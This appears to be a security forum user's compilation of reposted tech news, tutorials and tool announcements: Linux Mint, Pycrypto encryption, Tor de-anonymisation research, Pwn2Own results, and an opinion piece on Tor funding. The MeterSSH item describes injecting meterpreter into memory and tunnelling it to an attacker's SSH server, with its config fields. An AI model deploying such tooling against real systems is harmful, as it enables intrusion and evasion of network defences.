Everything posted by Nytro

  1. Linux Mint 17.1 “Rebecca” MATE RC released!

The team is proud to announce the release of Linux Mint 17.1 “Rebecca” MATE RC. Linux Mint 17.1 is a long term support release which will be supported until 2019. It comes with updated software and brings refinements and many new features to make your desktop even more comfortable to use.

New features at a glance: out-of-the-box support for Compiz, Update Manager, Language Settings, Login Screen, system improvements, artwork improvements, other improvements, main components, and the LTS strategy. For a complete overview and to see screenshots of the new features, visit “What’s new in Linux Mint 17.1 MATE”.

Important info: issues with Skype, DVD playback with VLC, Bluetooth, EFI support, solving freezes with some NVIDIA GeForce GPUs, booting with non-PAE CPUs, and other issues. Make sure to read the “Release Notes” to be aware of important info or known issues related to this release.

System requirements:
- x86 processor (Linux Mint 64-bit requires a 64-bit processor; Linux Mint 32-bit works on both 32-bit and 64-bit processors)
- 512 MB RAM (1 GB recommended for comfortable usage)
- 5 GB of disk space (20 GB recommended)
- Graphics card capable of 800×600 resolution (1024×768 recommended)
- CD/DVD drive or USB port

Bug reports: please report bugs in the comment section of this blog. Please visit https://github.com/linuxmint/Roadmap to follow the progress of the development team between the RC and the stable release.

Download md5 sums:
32-bit: a6f43b493cdec449e3232317f2b6e301
64-bit: 0609ad34999d7cae3d3689b9390fc05b

Torrents: 32-bit, 64-bit

HTTP Mirrors for the 32-bit DVD ISO: Argentina Xfree Australia AARNet Australia Internode Australia uberglobal Australia Western Australian Internet Association Austria Goodie Domain Service Bangladesh dhakaCom Limited Bangladesh IS Pros Limited Belarus ByFly Belgium Cu.be Solutions Brazil Universidade Federal do Parana Bulgaria Telepoint Canada University of Waterloo Computer Science Club China Qiming College of Huazhong University of Science and Technology China University of Science and Technology of China Linux User Group Colombia EDATEL Czech Republic CZ.NIC Czech Republic Ignum, s.r.o. Czech Republic UPC Ceska republika Denmark iODC Ecuador CEDIA France Crifo.org France finn.lu France Gwendal Le Bihan France IRCAM France Ordimatic Germany Artfiles Germany FH Aachen Germany Friedrich-Alexander-University of Erlangen-Nuremberg Germany GWDG Germany Hochschule Esslingen University of Applied Sciences Germany NetCologne GmbH Greece Hellenic Telecommunications Organization Greece National Technical University of Athens Greece University of Crete Greenland Tele Greenland Iceland Siminn hf Indonesia Jaran.undip Ireland HEAnet Israel Israel Internet Association Italy GARR Kazakhstan Neolabs Luxembourg root S.A. 
Netherlands NLUUG Netherlands Triple IT New Caledonia OFFRATEL LAGOON New Zealand University of Canterbury New Zealand Xnet Philippines PREGINET Poland ICM – University of Warsaw Poland Piotrkosoft Poland Polish Telecom Portugal Universidade do Porto Romania ServerHost Russia Yandex Team Serbia University of Kragujevac Singapore NUS – School of Computing – SigLabs Slovakia Rainside South Africa University of Free State South Africa Web Africa South Korea KAIST South Korea NeowizGames corp Spain Oficina de Software Libre do Cixug Sweden DF – Computer Society at Lund University Sweden Portlane Switzerland SWITCH Taiwan NCHC Taiwan Southern Taiwan University of Science and Technology Taiwan TamKang University Taiwan Yuan Ze University, Department of Computer Science and Engineering United Kingdom Bytemark Hosting United Kingdom University of Kent UK Mirror Service USA Advanced Network Computing Lab at the University of Hawaii USA advancedhosters.com USA Go-Parts USA James Madison University USA kernel.org USA MetroCast Cablevision USA Mirror.pw USA mirrorcatalogs.com USA Nexcess USA Secution, LLC. USA Team Cymru USA University of Oklahoma USA US Internet USA XMission Internet Vietnam FPT Telecom HTTP Mirrors for the 64-bit DVD ISO: Argentina Xfree Australia AARNet Australia Internode Australia uberglobal Australia Western Australian Internet Association Austria Goodie Domain Service Bangladesh dhakaCom Limited Bangladesh IS Pros Limited Belarus ByFly Belgium Cu.be Solutions Brazil Universidade Federal do Parana Bulgaria Telepoint Canada University of Waterloo Computer Science Club China Qiming College of Huazhong University of Science and Technology China University of Science and Technology of China Linux User Group Colombia EDATEL Czech Republic CZ.NIC Czech Republic Ignum, s.r.o. Czech Republic UPC Ceska republika Denmark iODC Ecuador CEDIA France Crifo.org France finn.lu France Gwendal Le Bihan France IRCAM France Ordimatic Germany Artfiles Germany FH Aachen Germany Friedrich-Alexander-University of Erlangen-Nuremberg Germany GWDG Germany Hochschule Esslingen University of Applied Sciences Germany NetCologne GmbH Greece Hellenic Telecommunications Organization Greece National Technical University of Athens Greece University of Crete Greenland Tele Greenland Iceland Siminn hf Indonesia Jaran.undip Ireland HEAnet Israel Israel Internet Association Italy GARR Kazakhstan Neolabs Luxembourg root S.A. Netherlands NLUUG Netherlands Triple IT New Caledonia OFFRATEL LAGOON New Zealand University of Canterbury New Zealand Xnet Philippines PREGINET Poland ICM – University of Warsaw Poland Piotrkosoft Poland Polish Telecom Portugal Universidade do Porto Romania ServerHost Russia Yandex Team Serbia University of Kragujevac Singapore NUS – School of Computing – SigLabs Slovakia Rainside South Africa University of Free State South Africa Web Africa South Korea KAIST South Korea NeowizGames corp Spain Oficina de Software Libre do Cixug Sweden DF – Computer Society at Lund University Sweden Portlane Switzerland SWITCH Taiwan NCHC Taiwan Southern Taiwan University of Science and Technology Taiwan TamKang University Taiwan Yuan Ze University, Department of Computer Science and Engineering United Kingdom Bytemark Hosting United Kingdom University of Kent UK Mirror Service USA Advanced Network Computing Lab at the University of Hawaii USA advancedhosters.com USA Go-Parts USA James Madison University USA kernel.org USA MetroCast Cablevision USA Mirror.pw USA mirrorcatalogs.com USA Nexcess USA Secution, LLC. 
USA Team Cymru USA University of Oklahoma USA US Internet USA XMission Internet Vietnam FPT Telecom

Enjoy! We look forward to receiving your feedback. Thank you for using Linux Mint and have a lot of fun testing the release candidate!

Sursa: The Linux Mint Blog » Blog Archive » Linux Mint 17.1 “Rebecca” MATE RC released!
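A quick way to verify a downloaded ISO against the md5 sums listed above is a minimal Python sketch like the following (the ISO filename is assumed for illustration):

import hashlib

def md5sum(path, chunksize=1 << 20):
    # hash the file in chunks so the whole ISO never sits in memory
    digest = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunksize), b""):
            digest.update(chunk)
    return digest.hexdigest()

# compare against the published sum for the 64-bit ISO (filename assumed)
print(md5sum("linuxmint-17.1-mate-64bit-rc.iso") ==
      "0609ad34999d7cae3d3689b9390fc05b")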
  2. Encrypting files with Pycrypto

Pycrypto is the only Python cryptography toolkit you'll ever need. It supports pretty much everything, it's rather fast, and it has an understandable interface and documentation. Cryptography, in itself, is rather complicated to understand and implement, and so is the documentation on encrypting files with pycrypto (or pretty much any crypto toolkit/library in the world). Recently, I was tasked with writing code that will encrypt files to be decrypted on a mobile platform, Android and iOS. Both of their documentations are lacking in that department. You can easily find a snippet that encrypts and decrypts a file on the same device, but not something that will work cross-device/cross-platform. That's because some crucial details of the encryption algorithms are never mentioned.

ELI5 AES

AES is a block cipher: it encrypts/decrypts in blocks of 128 bits. The key used for the [en|de]cryption is 128, 192 or 256 bits. So your data has to be divisible into 128-bit (16-byte) blocks, and your key must be exactly 128, 192 or 256 bits. Pretty tough requirements to meet, considering we're dealing with binary/text files of arbitrary length. Well, that's where padding comes in. In order to make the file's length divisible by 16 B, we have to pad it. The most used padding scheme is PKCS7: append n bytes, each with value n (1 <= n <= 16), to round the data up to a multiple of the 16 B block size. So the workflow is: pad -> encrypt -> decrypt -> unpad.

There's one more thing: the IV (initialization vector), which should also be 16 B. It's common practice to generate it at random and prepend it to the file on every encryption. We'll assume a static IV for the sake of simplicity. The documentation around the net usually doesn't mention the IV; the crypto system then creates one per device, and you'll be stuck wondering why you can decrypt on your phone but not on your desktop.

Enter AES256/CBC/PKCS7

This is the cookie-cutter scheme for encryption. It's supported by the mobile OSes and libraries; it's even the default! Doing this with openssl is easy (note that the raw key and IV are passed in hex with -K/-iv; lowercase -k would treat its argument as a passphrase and derive a different key):

# To Encrypt
openssl enc -aes-256-cbc -K 4c796f4e49706a386e7167357463756b716d57336b4a37504962487466654845 -iv 00000000000000000000000000000000 -in in_file -out out_file
# To Decrypt
openssl enc -d -aes-256-cbc -K 4c796f4e49706a386e7167357463756b716d57336b4a37504962487466654845 -iv 00000000000000000000000000000000 -in in_file -out out_file

In this example, the key is LyoNIpj8nqg5tcukqmW3kJ7PIbHtfeHE (32 B / 256 b, written out in hex) and the IV is set to 16 bytes of zeroes. Openssl pads with PKCS7 by default. Now let's see the example with pycrypto, assuming we have in_file and out_file already opened in binary mode:

from Crypto.Cipher import AES

# initialize the encryption
encryption_key = "LyoNIpj8nqg5tcukqmW3kJ7PIbHtfeHE"
iv = 16 * '\x00'
crypt = AES.new(encryption_key, AES.MODE_CBC, iv)

# keep chunk size large for speed, but divisible by 16 B
chunksize = 1024

while True:
    chunk = in_file.read(chunksize)
    if len(chunk) == 0:
        # The plaintext ended exactly on a chunk boundary, so no partial chunk
        # was ever padded: PKCS7 still requires a full block of padding.
        out_file.write(crypt.encrypt(16 * chr(16)))
        break
    elif len(chunk) == chunksize:
        # We've read a full chunk with length divisible by 16 B: encrypt as-is.
        out_file.write(crypt.encrypt(chunk))
    else:
        # We've read a final chunk that's not divisible by 16 B: PKCS7-pad it.
        # If we're missing 4 bytes, the padding sequence is 04 04 04 04 (hex).
        padding_bytes = AES.block_size - len(chunk) % AES.block_size
        out_file.write(crypt.encrypt(chunk + padding_bytes * chr(padding_bytes)))
        break

That's it. This should be decryptable with openssl, the Android crypto library, the iOS crypto library and any other device; you just need to know the encryption scheme, the IV and the encryption key. If you really want to make something secure, I suggest you think about generating a random IV each time the function is called. Sursa: Encrypting files with Pycrypto
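As a companion to the snippet above, here is a minimal sketch of the matching decryption loop under the same assumptions (static IV, in_file holding the ciphertext, both files opened in binary mode). PKCS7 unpadding reads the last decrypted byte n and strips n bytes:

from Crypto.Cipher import AES

encryption_key = "LyoNIpj8nqg5tcukqmW3kJ7PIbHtfeHE"
iv = 16 * '\x00'
crypt = AES.new(encryption_key, AES.MODE_CBC, iv)
chunksize = 1024  # divisible by 16 B, like on the encryption side

prev = None  # hold back one decrypted chunk so the padding can be stripped at EOF
while True:
    chunk = in_file.read(chunksize)
    if len(chunk) == 0:
        break
    if prev is not None:
        out_file.write(prev)
    prev = crypt.decrypt(chunk)

# The last decrypted chunk ends with the PKCS7 padding: its final byte is the
# number of padding bytes to strip (between 1 and 16).
padding_bytes = ord(prev[-1])
out_file.write(prev[:-padding_bytes])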
  3. Chainfire Releases CF-Auto-Roots For Nexus Line

Posted November 15, 2014 at 11:09 am by jerdog

Benjamin Franklin, the US statesman from simpler times, gave the famous quote in 1789 that “…in this world nothing can be said to be certain, except death and taxes.” I can’t fault him for not having the forethought to identify that there would be a few more certainties in life, and those would be “Chainfire releasing root for Nexus devices and providing analysis of the state of root on a new Google release.” For those not familiar, XDA Senior Recognized Developer Chainfire has become the preeminent source for information related to root on Android devices as well as analysis of how Google is changing system security on their new Android OS updates. His Google+ posts are often waited on with anticipation rivaling the title of the next Star Wars installment. OK, so maybe that’s a bit of a stretch – there weren’t any watch parties for the Star Wars announcement. With that being said, he recently updated his CF-Auto-Root downloads to include Android 5.0 root for all of the Nexus line: Nexus 4, Nexus 5, Nexus 7 (2012), Nexus 7 (2013), Nexus 9, and Nexus 10. A few of the key things changed for this release:
- The new variants of CFAR have the SuperSU ZIP embedded
- A second included ZIP (if on Lollipop or newer) patches the current kernel to run SuperSU at boot
- Current CFARs ship SuperSU v2.20, which is not currently available elsewhere and only has CFAR compatibility
For more information, make sure you check out the CFAR thread and his G+ stream to stay current on all Lollipop-related news. Sursa: Chainfire Releases CF-Auto-Roots For Nexus Line - XDA Forums
  4. 81% of Tor users can be de-anonymised by analysing router information, research indicates

Martin Anderson, The Stack
Friday 14 November, 2014

Research undertaken between 2008 and 2014 suggests that more than 81% of Tor clients can be ‘de-anonymised’ – their originating IP addresses revealed – by exploiting the ‘NetFlow’ technology that Cisco has built into its router protocols, and similar traffic analysis software running by default in the hardware of other manufacturers. Professor Sambuddho Chakravarty, a former researcher at Columbia University’s Network Security Lab and now researching network anonymity and privacy at the Indraprastha Institute of Information Technology in Delhi, has co-published a series of papers over the last six years outlining the attack vector, and claims a 100% ‘decloaking’ success rate under laboratory conditions, and 81.4% in the actual wilds of the Tor network.

Chakravarty’s technique [PDF] involves introducing disturbances in the highly-regulated environs of Onion Router protocols using a modified public Tor server running on Linux, hosted at the time at Columbia University. His work on large-scale traffic analysis attacks in the Tor environment has convinced him that a well-resourced organisation could achieve an extremely high capacity to de-anonymise Tor traffic on an ad hoc basis – but also that one would not necessarily need the resources of a nation state to do so, stating that a single AS (Autonomous System) could monitor more than 39% of randomly-generated Tor circuits. Chakravarty says: “…it is not even essential to be a global adversary to launch such traffic analysis attacks. A powerful, yet non-global adversary could use traffic analysis methods […] to determine the various relays participating in a Tor circuit and directly monitor the traffic entering the entry node of the victim connection.”

The technique depends on injecting a repeating traffic pattern – such as HTML files, the same kind of traffic of which most Tor browsing consists – into the TCP connection that it sees originating in the target exit node, and then comparing the server’s exit traffic for the Tor clients, as derived from the router’s flow records, to facilitate client identification. Tor is susceptible to this kind of traffic analysis because it was designed for low latency. Chakravarty explains: “To achieve acceptable quality of service, [Tor attempts] to preserve packet interarrival characteristics, such as inter-packet delay. Consequently, a powerful adversary can mount traffic analysis attacks by observing similar traffic patterns at various points of the network, linking together otherwise unrelated network connections.” The online section of the research involved identifying ‘victim’ clients at PlanetLab locations in Texas, Belgium and Greece, and exercised a variety of techniques and configurations, some involving control of entry and exit nodes, and others which achieved considerable success by only controlling one end or the other. Traffic analysis of this kind does not involve the enormous expense and infrastructural effort that the NSA put into their FoxAcid Tor redirects, but it benefits from running one or more high-bandwidth, high-performance, high-uptime Tor relays. 
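The statistical heart of this kind of attack can be pictured with a toy sketch (illustrative only, not Chakravarty's code; the flow-record format and names below are invented): bin the bytes-per-second of the injected server-side pattern and of each candidate client's NetFlow records, then rank candidates by correlation.

import numpy as np

def traffic_correlation(pattern, flows, num_bins):
    # pattern, flows: lists of (timestamp_in_seconds, num_bytes) records,
    # sorted by time; the first record marks t0 for its series
    def to_series(records):
        series = np.zeros(num_bins)
        start = records[0][0]
        for ts, nbytes in records:
            idx = int(ts - start)
            if 0 <= idx < num_bins:
                series[idx] += nbytes  # bytes observed in this one-second bin
        return series
    # Pearson correlation between the two per-second volume curves
    return np.corrcoef(to_series(pattern), to_series(flows))[0, 1]

# Rank candidates: the victim's flow records should track the injected pattern.
# scores = {c: traffic_correlation(injected_pattern, netflow_records[c], 300)
#           for c in candidate_clients}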
Forensic interest in how the international cybercrime initiative ‘Operation Onymous’ defied Tor’s obfuscating protocols to expose hundreds of ‘dark net’ sites, including the infamous online drug warehouse Silk Road 2.0, has led many to conclude that the core approach to deanonymisation of Tor clients depends upon becoming a ‘relay of choice’ – and a default resource when Tor-directed DDoS attacks put ‘amateur’ servers out of service. Sursa: 81% of Tor users can be de-anonymised by analysing router information, research indicates
  5. Nexus 5, Galaxy S5 and iPhone 5s hacked at Pwn2Own event

The Samsung Galaxy S5, Apple iPhone 5s and Google Nexus 5 were amongst handsets to be successfully hacked during the Mobile Pwn2Own hacking competition, reports Forbes. The event is an annual competition which offers cash prizes to those that can reveal security weaknesses in handsets. Sponsored by BlackBerry and Google Android, the event offered a total prize pool of $425,000 to those who could hack the handsets, and prizes were claimed pretty quickly: just one day into the two-day event, the iPhone 5s, Samsung Galaxy S5, Nexus 5 and Amazon Fire Phone had all been successfully hacked. International Business Times has some more details on the hacks of each handset. It reports that the iPhone 5s fell to “a combination of two vulnerabilities” which allowed the attackers to hack it via the Safari browser, achieving a ‘full sandbox escape.’ The Samsung Galaxy S5 and Google Nexus 5, on the other hand, both fell foul of exploits using the NFC chip – this wasn’t an option on the iPhone 5s, which does not have one, though the recently released iPhone 6 has introduced the chip for the first time. The Amazon Fire Phone, which runs a customized version of Android, fell “using a combination of three separate vulnerabilities”. Bad news for iOS and Android phones then, but what of Windows Phone? Well, according to Ars Technica, a single hacker attempted to take on the Lumia 1520, but was rebuffed. The hacker was apparently “able to exfiltrate the cookie database”, but “unable to gain full control of the system.” HP, which runs the event as part of its Zero Day Initiative, will release more detail on the nature of the hacks once the companies have had time to patch the vulnerabilities. Sursa: Nexus 5, Galaxy S5 and iPhone 5s hacked at Pwn2Own event
  6. MeterSSH – Meterpreter over SSH

As penetration testers, it’s crucial to identify what types of attacks are detected and what’s not. After running into a recent penetration test with a next generation firewall, most analysis has shifted away from the endpoints and more towards network analysis. While there needs to be a mixture of both, MeterSSH demonstrates how easy it is to circumvent a lot of these signature-based “next generation” product lines. MeterSSH is an easy way to inject native shellcode into memory and pipe anything over SSH to the attacker machine through an SSH tunnel, all self-contained in one single Python file. Python can easily be converted to an executable using pyinstaller or py2exe.

MeterSSH is easy: simply edit the meterssh.py file, add your SSH server IP, port, username, and password, and run the script. It will spawn meterpreter through memory injection (in this case a windows/meterpreter/bind_tcp) and bind to port 8021. Paramiko (a Python SSH module) is used to tunnel meterpreter over 8021 back to the attacker, with all communications tucked within that SSH tunnel.

First we launch our initial meterssh payload. Next we launch monitor.py, which monitors for the SSH connection and automatically launches Metasploit: once it detects the SSH connection and shell, it kicks off Metasploit for you. Notice that we are tunneling through localhost to the victim machine.

There are two files, monitor.py and meterssh.py.

monitor.py – run this in order to listen for an SSH connection; it will poll for 8021 on localhost for an SSH tunnel, then spawn Metasploit for you automatically to grab the shell.
meterssh.py – this is what you would deploy to the victim machine. Note that most Windows machines won’t have Python installed; it’s recommended to compile it with py2exe or pyinstaller.

Fields you need to edit inside meterssh.py:

user = "sshuser"      # user account for the attacker's SSH server (do not use root; root is not needed)
password = "sshpw"    # password for the attacker's SSH server
rhost = "192.168.1.1" # the attacker's SSH server IP address
port = "22"           # the attacker's SSH server port

Note that you DO NOT need to change the Metasploit shellcode; it is simply an unmodified windows/meterpreter/bind_tcp that binds to port 8021. If you want to change this, just switch the shellcode out and change port 8021 inside the script to bind to whatever port you want. You do not need to do this unless you want to customize/modify.

You can download meterssh from our github page: Download MeterSSH from Github

By davek | November 14th, 2014

Sursa: https://www.trustedsec.com/november-2014/meterssh-meterpreter-ssh/
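To picture the tunneling piece described above, here is a minimal paramiko sketch of the general technique (an illustration under assumed values, not TrustedSec's actual meterssh.py). The victim-side script connects out to the attacker's SSH server and asks it to forward the server's local port 8021 back through the tunnel to the meterpreter bind_tcp listener on the victim:

import socket
import threading
import paramiko

def pipe(src, dst):
    # shuttle bytes one way until either side closes
    while True:
        data = src.recv(4096)
        if not data:
            break
        dst.sendall(data)

# connect out to the attacker's SSH server (values mirror the fields above)
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect("192.168.1.1", port=22, username="sshuser", password="sshpw")

# reverse port forward: the attacker's localhost:8021 now reaches the victim
transport = client.get_transport()
transport.request_port_forward("127.0.0.1", 8021)

while True:
    chan = transport.accept()          # the attacker connected through the tunnel
    if chan is None:
        continue
    sock = socket.socket()
    sock.connect(("127.0.0.1", 8021))  # local meterpreter bind_tcp listener
    threading.Thread(target=pipe, args=(chan, sock)).start()
    threading.Thread(target=pipe, args=(sock, chan)).start()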
  7. +22: x64 binary → x86 Hex-Rays

Plus22 transforms x86_64 executables to be processed with the 32-bit version of Hex-Rays Decompiler. This tool was created in mid-2013 for internal use in More Smoked Leet Chicken, and made public in November 2014 when Hex-Rays x64 finally came out.

Usage

php plus22.php [-va] {x64_binary.bin or listing.asm}

If the file name ends with '.asm', it will be interpreted as an ASM listing. Otherwise, it will be interpreted as an x64 ELF/PE and disassembled with IDA.
-v  be verbose and leave all temporary files
-a  AutoNop all lines with errors
You can use _misc\php.exe to run the script. Plus22 is designed to run in a Windows environment, and works well under Wine.

Specifying your IDA path

To decompile and restore types automatically, Plus22 needs to know where IDA is installed. You can add your path to the $idaPaths array right at the top of the script, or have it done for you automatically when Plus22 needs your IDA installation path. Without specifying the IDA path, you can do the following by hand:
1. Load the binary in IDA64
2. View → Unhide all (uncollapse functions)
3. File → Produce file → Create ASM file
4. php plus22.php mega_binary.asm
5. If you're lucky, an .obj is created. Load the .obj in IDA
6. File → Script file... and execute mega_binary+22.idc for correct function types

Files

_misc\php.exe — compatible PHP version from PHP For Windows
_misc\original_instructions.idc — IDA script to manually load the original instruction toggler
_misc\functype.db — imported functions type database, parsed from the IDA TIL collection
_misc\jwasm.exe — fast Masm-like assembler from JWasm | SourceForge.net
_misc\exporter.idc — ASM listing export helper IDA script
_example\ — Network 300 from ebCTF 2013 Teaser processed with Plus22. This x64 binary uses the raw socket API and heavily utilizes BN_* functions from OpenSSL.

Changelog

v0.3
[+] error correction mode: allows fixing the ASM source interactively and re-compiling right in +22
[+] '-a' command line switch: auto-nop all errors without user interaction
v0.2.3
[+] type matching for float calling convention (XMM registers)
[+] type guessing support for XMM
[+] automatic 64-bit -> 32-bit constant truncation
v0.2.2
[-] removed collapsed function handling
[+] press Alt-Z to toggle between converted and original x64 instructions
v0.2.1
[+] changeable calling convention: now supports Windows x64 binaries
[+] automatic main() detection
[.] more compatible data types
[.] variadic arguments expansion
v0.2
[+] type matching for imports
[+] type guessing for internal functions
[+] fully automatic ELF disassembly
v0.1.1
[+] clip_type_helper: automatic calling convention converter
[.] more automatic patches
v0.1
[+] directive and instruction patches
[+] being able to build an x86 binary
[.] collapsed function emulation

Sursa: https://github.com/v0s/plus22
  8. A VMware Guest to Host Escape Story

Kostya Kortchinsky, Immunity, Inc.
BlackHat USA 2009, Las Vegas

Why devices?
- I don't have enough low-level system Mojo
- They are common to all VMware products
- They "run" on the host (the vmware-vmx process)
- They can be accessed from the guest, through port I/O or memory-mapped I/O
- They are written in C/C++
- They sometimes parse some complex data!

Download: http://www.blackhat.com/presentations/bh-usa-09/KORTCHINSKY/BHUSA09-Kortchinsky-Cloudburst-SLIDES.pdf
  9. How leading Tor developers and advocates tried to smear me after I reported their US Government ties

By Yasha Levine On November 14, 2014

“I contract for the United States Government to build anonymity technology for them and deploy it.” — Roger Dingledine, cofounder of Tor, 2004

* * *

About three months ago, I published an article exploring the deeply conflicted ties between agencies of the U.S. National Security State, and the Tor Network—an online anonymity tool popular among anti-surveillance privacy groups and activists, including Edward Snowden. My article traced the history of Tor and the US military-intelligence apparatus that spawned it—from Tor’s initial development by military researchers in the mid-1990s at the US Naval Research Laboratory in Washington DC, through its quasi-independent period after it was spun off as a nonprofit in 2004 but continued to receive most of its funding from a variety of government branches: Pentagon, State Department, USAID, Radio Free Asia. My article also revealed that Tor was created not to protect the public from government surveillance, but rather, to cloak the online identity of intelligence agents as they snooped on areas of interest. But in order to do that, Tor had to be released to the public and used by as diverse a group of people as possible: activists, dissidents, journalists, paranoiacs, kiddie porn scum, criminals and even would-be terrorists — the bigger and weirder the crowd, the easier it would be for agents to mix in and hide in plain sight.

Finally, I pointed out that Tor was not nearly as secure as many of its proponents claimed. For people who really had something to hide from the state, Tor very likely offered the opposite of anonymity: it singled out users for total NSA surveillance, with intel agencies potentially sucking up and recording everything they did online. Recent events have proven yet again that Tor is not as secure as its fans claim, or as its own developers say they hoped.

All of this information is public, and it’s been out there for quite a while—but mostly in a scattered and fragmented way. As a result, the full story of Tor’s many pitfalls and contradictions has never been widely known by the public. So even people who should know better, and who care about this issue, have been promoting Tor as a grassroots anti-government surveillance tool without questioning or double-checking that story. When people are told about Tor’s roots in intelligence, and its ongoing funding from the Pentagon, they are usually shocked and surprised. So was I. The Tor story needed to be revisited, which I did, assembling all the verifiable facts: tax and financial records; public statements by Tor’s inventors and developers; published academic papers, and so on. Before publishing, we at Pando reached out multiple times to several key Tor people for comment; editors meticulously fact-checked the article before putting it up.

One would’ve thought that an article warning about Tor’s little-known dangers and conflicts-of-interest would’ve been welcomed by the privacy and anonymity community—that they would be more interested in protecting the public and getting Tor right, than in protecting Tor’s brand. But instead of being welcomed by the privacy community or sparking a discussion about the aspects of Tor that have been swept under the rug, the article was met with a smear campaign. 
Surprisingly, the smears weren’t waged by the usual fringe anonymous-troll types, but rather by some of the most prominent privacy and anti-surveillance names in the country—top people from groups like the ACLU, Electronic Frontier Foundation, Freedom of the Press Foundation, and Pierre Omidyar’s First Look Media. Curiously, not a single one of these critics disputed the facts in the story. There wasn’t a single factual error they could point to; so instead, they took to a range of familiar PR smear tactics—tactics one usually sees used by oil company PR flacks, but not by privacy hacktivists. First, they flooded social media telling anyone who showed interest in my article that they should ignore it; then when that didn’t work and the article caught fire, they tried to discredit it with crude insults, misdirection, and outright lies, even going as far as to claim that I’m funded by the CIA. From my experience, when your article produces bizarre hostile reactions like this it means you’ve hit on something important.

Take Tor developer Andrea Shepard. As soon as my story went live, Shepard responded with a torrent of childish insults, calling me “Pandofilth” and “Yasha the Foul,” a “statist propagandist,” a “fucktard’s fucktard.” Shepard accused me of being funded by spooks, and ranted on and on about the various ways in which she said I had performed sexual favors for a male colleague. She hurled similar childish abuse at anyone she caught commenting positively about my article. When readers suggested to Shepard that she should instead offer a point-by-point rebuttal of my article, rather than swearing at and insulting anyone who mentioned it, she responded that my article wasn’t worth the effort of rebutting (only insulting), and that I don’t deserve to live:

@Raed667 @headhntr Yasha Levine doesn’t merit that kind of effort. Frankly, he doesn’t merit *oxygen*. — Andrea (@puellavulnerata) July 18, 2014

Jacob Appelbaum, another Tor developer who crisscrosses the globe promoting it as a tool against government surveillance, had refused my multiple requests for comment when I was working on the article. When it was published, he called my reporting “a bunch of bullshit”, but refused to elaborate with a substantive rebuttal. Instead, Appelbaum made vague suggestions that I was driven by dark and mysterious motives:

@gbelljnr I don’t. I don’t have time for jerks who use that nonsense to service their other agenda. Boring waste of time. — Jacob Appelbaum (@ioerror) October 26, 2014

Perhaps it’s somewhat understandable that salaried Tor developers like Andrea Shepard and Jacob Appelbaum went on the attack. Shepard is a libertarian (which is why she called me “statist”—a harsh epithet in her libertarian world); Appelbaum is a bit of a celebrity in the anti-surveillance community, having helped set up Wikileaks, and lately being constantly profiled as a rebel-fugitive hiding out in Berlin from his NSA pursuers. Both Appelbaum and Shepard circulate in radical anti-police state circles, and my article pointed out that they earn $100,000-plus annual salaries working for a nonprofit federal government security contractor—a nonprofit that gets at least three-quarters of its annual funding from the Pentagon, State Department, and other federal agencies. In other words, Tor anti-National Security State rebels are living off the largesse of their NatSec State nemesis. But it wasn’t only Tor employees who were determined to discredit my reporting. 
Take Jillian York, “Director for International Freedom of Expression” at the Electronic Frontier Foundation, a tech industry lobby group funded by Silicon Valley’s largest corporations. As soon as the story came out, she counseled her 45,000 followers to ignore my story:

@puellavulnerata yeah I just don’t see the news here. — Jillian C. York (@jilliancyork) July 17, 2014

The reason? Because it was not being shared very much on social media:

@puellavulnerata well, it seems like only 15 or so people have bothered to tweet the article, so… — Jillian C. York (@jilliancyork) July 17, 2014

(I’m not convinced that social traffic is a meaningful measure of an article’s importance but, for what it’s worth, the piece currently has around 1.5k Twitter shares and a little over 4k Facebook likes.)

Morgan Marquis-Boire, a former Googler who was recently poached by Pierre Omidyar to run security at First Look, called me a loony conspiracy theorist for reporting on Tor’s government funding—but then contradicted himself by arguing that this “conspiracy theory” is a matter of public record. It was a baffling, oxymoronic argument to make—accusing my article of being both a wild conspiracy theory and boring old news that no one should bother reading—but for some reason, Tor defenders thought this self-contradiction made perfect logical sense:

I wish all the @torproject conspiracy theorists would just read the damn website https://t.co/bYo88BNY81 — Morgan Mayhem (@headhntr) July 28, 2014

Pando’s Tor conspiracy piece stops just short of the real truth… That Roger Dingledine is really Senator Palpatine Almost everyone involved in developing Tor was (or is) funded by the US government | PandoDaily — Morgan Mayhem (@headhntr) July 18, 2014

@ggreenwald @torproject they get funding from USG?? “…which houses the NSA.” -> connect the dots sheeple! — Morgan Mayhem (@headhntr) July 28, 2014

Christopher Soghoian, who works on privacy policies for the ACLU, took the lowest, scummiest road. Soghoian compared my reporting on Tor to the Protocols of the Elders of Zion, a sick anti-Semitic forgery disseminated by the Tsar’s secret police, unleashing waves of deadly pogroms against Jews across the Russian Empire in the early 20th century. As a refugee from the Soviet Union whose family escaped from state-sponsored anti-Semitism, I found Soghoian’s comparison to be outrageously offensive and disgusting.

It seems that Tor is developed by the Elders of Zion, and @ioerror is responsible for 9/11. Almost everyone involved in developing Tor was (or is) funded by the US government | PandoDaily Hall of Mirrors: Wikileaks volunteer helped build Tor, was funded by the Pentagon | PandoDaily — Christopher Soghoian (@csoghoian) August 6, 2014

I tried to confront Soghoian over his disgusting anti-Semitic smear against me:

Last thing I need is for you, @csoghoian, to smear my reporting by comparing to virulent anti-Semitic propaganda. — Yasha Levine (@yashalevine) August 6, 2014

But the ACLU’s Soghoian brushed it off with snark:

@yashalevine you want to talk about offensive? Look at your Twitter background image. Totally unfair to @RogerDingledine. — Christopher Soghoian (@csoghoian) August 6, 2014

And mocked me as a mentally ill paranoiac:

@exiledonline Your pal is a conspiracy theorist who sees black helicopters everywhere. Go read his hatchet job against Tor, — Christopher Soghoian (@csoghoian) August 6, 2014

Only later, after getting his smears out of his system, Soghoian was finally able to formulate something of a critique. 
It boiled down to this: He did not like my article because it raised questions about Tor’s longstanding financial relationship with the US government’s military-intelligence agencies—questions he dismissed as irrelevant, treating only purely technical critiques as legitimate:

“My beef is that your article has no solid technical criticism, but some hand waving about funding. There are so many things you could have nailed Tor for, but instead, you went for lazy low hanging fruit about funding.”

What were these many things I could have nailed Tor for? Well, he was helpful enough to give me a couple of suggestions:

“There are many things about Tor to worthy of criticism: A crappy user interface, no auto security updates, no browser sandbox. Your attacks against Tor’s state dept funding, or Roger’s summer internship in college at the NSA, are stupid though.”

Yes, what sane journalist would care that Tor was created by military intelligence, is currently funded by the government and is almost certainly a giant honeypot. That’s all secondary and “low hanging fruit” compared to the big giant issue of our day: Tor’s crappy user interface.

